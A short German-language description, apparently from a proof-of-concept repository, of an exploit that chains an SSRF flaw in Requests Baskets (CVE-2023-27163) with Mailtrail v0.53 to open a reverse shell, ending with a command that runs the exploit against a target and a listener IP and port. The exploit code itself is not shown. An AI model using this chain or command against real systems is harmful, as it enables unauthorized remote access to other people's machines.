
Requests Baskets (CVE-2023-27163) und Mailtrail v0.53
Der folgende Exploit nutzt die Requests Baskets v1.2.1 SSRF-Schwachstelle aus, um die interne Anwendung, die unter 127.0.0.1:80 läuft, an die externe Anwendung unter /pwned weiterzuleiten. Sobald die Mailtrail v0.53-Anwendung weitergeleitet wurde, wird ein Reverse-Shell-Befehl gegen sie ausgeführt, und innerhalb weniger Sekunden sollte der Benutzer eine Reverse-Shell auf dem Rechner erhalten.
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT